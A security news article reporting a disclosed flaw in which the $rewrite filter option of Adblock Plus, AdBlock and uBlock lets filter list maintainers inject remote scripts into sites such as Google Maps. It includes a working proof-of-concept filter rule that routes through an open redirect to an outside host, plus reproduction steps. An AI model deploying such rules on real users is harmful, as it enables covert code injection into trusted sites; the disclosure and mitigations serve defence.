Adblock Plus filter can be exploited to execute arbitrary code in web pages

Pierluigi Paganini April 16, 2019

Expert discovered an exploit that could allow ad blocking filter list maintainers for the Adblock Plus, AdBlock, and uBlocker browser extensions to craft filters to inject remote scripts into web sites.

ad blocking extensions receive in input a list of malicious URLs that prevents the browser from connecting to them.

With the release of Adblocker Plus 3.2 in 2018, a new filter list option was implemented to allow a list maintainer to replace a web request. The option called $rewrite allows to replace an URL that matches a particular regular expression with another URL.

Security researcher Armin Sebastian discovered that under certain conditions it is possible to create a rule that injects a remote script into a target site.

“Under certain conditions the $rewrite filter option enables filter list maintainers to inject arbitrary code in web pages.” Armin wrote.

“The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.”

The exploit is possible with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.

Extensions periodically update filters at intervals determined by filter list operators. An attacker may set a short expiration time for the malicious filter list, and replace with a benign one shortly after the attack making it impossible to detect.

In order to use the exploit against a service, the following criteria must be met:

  1. The page must load a JS string using XMLHttpRequest or Fetch and execute the returned code
  2. The page must not restrict origins from which it can fetch using Content Security Policy directives, or it must not validate the final request URL before executing the downloaded code
  3. The origin of the fetched code must have a server-side open redirect or it must host arbitrary user content

Armin Sebastian used Google Maps for his test:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

The above rule redirects users visiting Google Maps to Google’s I’m Feeling Lucky search service, that in turn redirects to a page
from https://majestic-ramsons.herokuapp[.]com/ with the payload: “alert(document.domain)”.

ADblock exploit

Below the procedure for running arbitrary code on Google Maps:

  1. Install either Adblock Plus, AdBlock or uBlock in a new browser profile
  2. Visit the options of the extension and add the example filter list, this step is meant to simulate a malicious update to a default filter list
  3. Navigate to Google Maps
  4. An alert with “www.google.com” should pop up after a couple of seconds

The expert reported the issue to Google, but they rejected it classifying the issue as an “Intended behavior”.

“Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.” wrote the expert.

Armin Sebastian recommends that web sites utilize the Content Security Policy header and the connect-src option to specify a whitelist of sites that scripts can be loaded from.

The exploit can be mitigated in the affected web services by whitelisting known origins using the connect-src CSP header, or by eliminating server-side open redirects.

Update April 16, 2019

Adblockplus is already working on eliminating any risk for its users.

“It is our responsibility to protect our users, and despite the actual risk being very low, we have decided to remove the rewrite option and will accordingly release an updated version of Adblock Plus as soon as technically possible.We are doing this as a measure of precaution. There has not been any attempt of abusing the rewrite option and we will do everything we can to ensure this won’t happen.” reads a statement published by adblockplus.org.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment